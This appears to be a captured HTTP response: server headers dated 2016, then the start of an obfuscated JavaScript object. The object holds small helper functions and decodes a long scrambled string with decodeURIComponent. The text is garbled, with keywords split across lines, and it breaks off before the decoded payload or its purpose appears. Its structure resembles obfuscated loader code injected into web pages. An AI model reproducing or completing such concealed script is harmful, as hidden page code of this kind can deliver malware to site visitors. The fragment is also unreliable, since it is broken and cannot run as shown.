Last-Modified: Wed, 30 Nov 2016 10:06:34 GMT

Connection: keep-alive

ETag: "583ea4aa-10100"

Accept-Ranges: bytes
var Bwda={t5:function(x,y){return x<y;},L5:function(){return{b:func
tion(e){var a='',d=decodeURIComponent("%/A#j'$6Am8',"~%
2303'E6n$( Q-'}""Z15{huK>~ 0Il2?2&1-=%6
0}2-=`X!./oA+B=6.;A,K>~?23./o*m-=`w0?$2+Gl9 '[7(-=`v%3
CZ25!57K>~u?2